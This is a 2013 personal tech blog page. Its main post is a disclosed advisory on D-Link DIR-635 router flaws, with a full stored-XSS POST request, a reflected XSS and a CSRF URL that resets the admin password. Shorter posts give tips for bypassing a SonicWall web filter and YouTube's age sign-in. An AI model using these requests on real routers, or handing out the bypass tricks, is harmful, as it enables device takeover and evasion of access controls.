Sunday, April 28, 2013

Security Advisory : Multiple Vulnerabilities in D'Link DIR-635


============ Vulnerable Firmware Releases: ============

 Firmwareversion: 2.34EU
Hardware-Version: B1
Produktseite: DIR-635

 ============ Vulnerability Overview: ============

 * Stored XSS -> Status - WLAN -> SSID

 Injecting scripts into the parameter config.wireless%5B0%5D.ssid_profiles%5B0%5D.ssid reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

 Place the Code via Setup -> Wireless -> Wireless Network Name

 POST /Basic/Wireless.shtml HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.0.1/Basic/Wireless.shtml
Content-Type: application/x-www-form-urlencoded
Content-Length: 2307

 config.wireless%5B0%5D.radio_control=1&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wlan_schedule_name=Alw
ays&config.wireless%5B0%5D.ssid_profiles%5B0%5D.ssid=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%282
%29%3E&config.wireless%5B0%5D.erp_protection=true&config.wireless%5B0%5D.phy_mode=11&config.wireless%5B0
%5D.auto_channel=true&config.wireless%5B0%5D.channel=6&config.wireless%5B0%5D.tx_rate=0&config.wireless%5B
0%5D.cwm_mode=0&config.wireless%5B0%5D.num_streams=65535&config.wireless%5B0%5D.ssid_profiles%5B0%5D.i
nvisibility=0&wireless_invisibility_radio_0=0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.qos=0&config.wireless
%5B0%5D.ssid_profiles%5B0%5D.wepon=false&config.wireless%5B0%5D.ssid_profiles%5B0%5D.ieee8021x_enabled=fa
lse&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_enabled=true&config.wireless%5B0%5D.ssid_profiles%5B0
%5D.keylen=1&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wep_key_type=0&config.wireless%5B0%5D.ssid_profi
les%5B0%5D.wep_key%5B0%5D=1234567890255123456789
 0255&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wep_key%5B1%5D=12345678902551234567890255&config.wirele
ss%5B0%5D.ssid_profiles%5B0%5D.wep_key%5B2%5D=12345678902551234567890255&config.wireless%5B0%5D.ssid_
profiles%5B0%5D.wep_key%5B3%5D=12345678902551234567890255&config.wireless%5B0%5D.ssid_profiles%5B0%5D.
use_key=0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.auth=1&config.wireless%5B0%5D.ssid_profiles%5B0%5D.
wpa_mode=2&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_cipher=3&config.wireless%5B0%5D.ssid_profiles
%5B0%5D.wpa_rekey_time=3600&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_psk=%22%3E%3Cimg+src%3D
%220%22+onerror%3Dalert%281%29%3E&config.wireless%5B0%5D.ssid_profiles%5B0%5D.ieee8021x_reauth_time=60&
config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius_server_address=0.0.0.0&config.wireless%5B0%5D.ssid_profiles
%5B0%5D.radius_server_port=1812&config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius_shared_secret=radius_sha
red&config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius
 _auth_mac=true&config.wireless%5B0%5D.ssid_profiles%5B0%5D.
second_radius_server_address=0.0.0.0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.second_radius_server_port=1
812&config.wireless%5B0%5D.ssid_profiles%5B0%5D.second_radius_shared_secret=radius_shared&config.wireless%5
B0%5D.ssid_profiles%5B0%5D.second_radius_auth_mac=true

 The code gets executed via Status -> Device Information:
http://Target-IP/Status/Device_Info.shtml

 * reflected XSS via Extras -> system Check -> Ping

 Injecting scripts into the parameter data reveals that this parameter is not properly validated for malicious input.

 * For changing the current password there is no request to the current password

 With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

 * CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:

 http://Target-IP/Tools/Admin.shtml?config.password=admin1&config.user_password=&config.gw_name=D-
Link+Systems+DIR-
635&config.web_server_idle_timeout=5&config.graph_auth=false&config.web_server_allow_https=false&config.web_se
rver_allow_wan_http=false&config.web_server_allow_wan_https=false&config.web_server_wan_port_http=8080&confi
g.web_server_wan_port_https=8181&config.wan_web_ingress_filter_name=Allow+All&wan_ingress_filter_details=Allo
w+All

 ============ Solution ============

 No known solution available.

 ============ Credits ============

 The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-013
Twitter: @s3cur1ty_de

 ============ Time Line: ============

 November 2012 - discovered vulnerability
11.11.2012 - contacted dlink via the webinterface http://www.dlink.com/us/en/support/contact-support
20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
21.12.2012 - D-link responded that they will check the findings
11.01.2013 - requested status update
25.01.2013 - requested status update
25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix
25.04.2013 - public release
Posted by at No comments:
Labels: , ,

Replace Eclipse Splash Screen

At work, we are currently using a modified version of the Eclipse IDE, so whenever I open Eclipse I see the company's logo. If you're the type of person who likes to personalize stuff (like me) you can change the Eclipse IDE's default splash screen following the directions below:

 1. (This step may be necessary in some distros, specially for modified versions of Eclipse, but not really that important if the file used is still the default) Navigate to the Eclipse configuration file normally located in the  path below:

 {eclipseBaseDirectory}\configuration\config.ini

 2. Check the location of the splash image as defined in the configuration file (should look like the one below):

 osgi.splashPath=platform\:/base/plugins/org.eclipse.platform

 Note: The path above is the default path of the splash image, hence if the version of Eclipse that you are using is not modified, chances are the splash image should be here.

 3. Navigate to the path defined in the configuration file and replace the file named "splash.bmp"

 4. Restart Eclipse and voila!





Posted by at No comments:
Labels: ,

Saturday, April 27, 2013

Money or Dignity?


Posted by at No comments:
Labels: , , ,

Friday, April 26, 2013

Saving and Restoring your session's Tabs in Chrome

I'm the kind of person that tends to keep huge numbers of tabs open either for future reading or just 'cause I know I'll be using them later on. With Firefox, this is a mess, 'cause if one of the tabs stop responding you'll have to kill the entire session and relaunch the entire browser. With Chrome and IE though, the system treats each tab as a separate instance of the application. Hence, when one of the tabs become unstable, you can just kill that specific instance and keep the rest alive.

Problem is if it is the PC itself that becomes unresponsive. Well Chrome has something that can deal with this (sort off...).


Tab Saver is Chrome add on I recently added to my Chrome portable. Available for download here. It saves your tab list on your disk so you can open it later. The add on, by the way, detects the open tabs per window. So if you have tab groups open on multiple Chrome windows, you can save them separately then open them later on for viewing.

Posted by at No comments:
Labels: , ,

Thursday, April 25, 2013

Anonymous- What we are capable of 2012

Posted by at No comments:

Saturday, April 20, 2013

Bypass SonicWall Internet firewall without using Proxy

Say you want to browse a website but your IT has set a restriction on viewing some websites within your corporate network. You can always use a proxy but this would undermine the security of your browsing (as what proxy servers do is become a "middle-man" for the internet traffic when you use them, sending the data you send to website on your behalf and serving the data returned to you by the website in return). One such example, Sonicwall (and some other web access restriction firewalls) can be easily tricked (if not setup porperly by your IT) by browsing the "secure" version of the website.

Example:
http://www.facebook.com


Change the URL to:
https://www.facebook.com


Posted by at No comments:
Labels: ,

Sunday, April 7, 2013

How to Flush DNS in Different operating Systems


The role of the Domain Name Server is to translate URLs and FQDNs into their corresponding IP Addresses and allow you to route traffic to and from the target machines (whether it be a local network or over the internet). In case of DNS poisoning or just an incorrectly cached address mapping, you can "flush" the DNS to get a new list of name resolution.

To flush DNS cache in Microsoft Windows
 - open up command prompt and type in:
 ipconfig /flushdns

To flush the DNS cache in Linux, restart the nscd daemon
 - issue the following command:
 /etc/rc.d/init.d/nscd restart

To flush the DNS cache in Mac OS X Leopard:
 - open up terminal and issue the following command:
 lookupd -flushcache

To flush the DNS cache in Mac OS X
 - open up terminal and issue the following command:
 dscacheutil -flushcache
Posted by at No comments:
Labels: , ,

Saturday, April 6, 2013

How to watch flagged Youtube videos without Signing In

You know when you try to watch a Youtube video that requires Login credentials to make sure you are 18+? You can bypass this authentication by working the video's URL.

sample URL (note the video ID):
www.youtube.com/watch?v=SBxjSWEhCVg

To get pass the authentication part, you simply need to modify the URL into something like:
www.youtube.com/watch_popup?v=SBxjSWEhCVg

You can also use the following pattern:
www.youtube.com/v/SBxjSWEhCVg?fs=1

Enjoy!
Posted by at No comments:
Labels: , , ,
Subscribe to: Posts (Atom)